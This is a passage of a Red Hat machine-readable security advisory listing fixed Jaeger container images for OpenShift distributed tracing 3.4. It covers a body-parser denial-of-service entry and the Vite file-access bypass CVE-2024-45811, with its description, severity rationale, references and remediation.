"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "body-parser: Denial of Service Vulnerability in body-parser" }, { "cve": "CVE-2024-45811", "cwe": { "id": "CWE-284", "name": "Improper Access Control" }, "discovery_date": "2024-09-17T20:00:49.944925+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2312930" } ], "notes": [ { "category": "description", "text": "A flaw was found in ViteJS. `@fs` denies access to files outside of Vite serving allow list. Adding `?import\u0026raw` to the URL bypasses this limitation and returns the file content if it exists, which can allow an attacker to access arbitrary files via the browser.", "title": "Vulnerability description" }, { "category": "summary", "text": "vite: server.fs.deny is bypassed when using `?import\u0026raw`", "title": "Vulnerability summary" }, { "category": "other", "text": "This vulnerability is classified as moderate rather than high severity because it requires specific conditions for exploitation. The attacker must have access to the Vite server, which typically runs in a local development environment rather than in production. Additionally, the bypass allows file access only if the file path is already known or predictable, limiting the attacker\u0027s ability to arbitrarily explore the file system. While it exposes file content outside the Vite serving allow list, the scope of access is constrained, and the impact can be mitigated by proper server configurations and deployment practices.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-45811" }, { "category": "external", "summary": "RHBZ#2312930", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312930" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-45811", "url": "https://www.cve.org/CVERecord?id=CVE-2024-45811" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45811", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45811" }, { "category": "external", "summary": "https://github.com/vitejs/vite", "url": "https://github.com/vitejs/vite" }, { "category": "external", "summary": "https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249", "url": "https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249" }, { "category": "external", "summary": "https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34", "url": "https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34" }, { "category": "external", "summary": "https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd", "url": "https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd" }, { "category": "external", "summary": "https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6", "url": "https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6" }, { "category": "external", "summary": "https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7", "url": "https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7" }, { "category": "external", "summary": "https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx", "url": "https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx" } ], "release_date": "2024-09-17T18:44:12+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-10T11:04:35+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10917" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 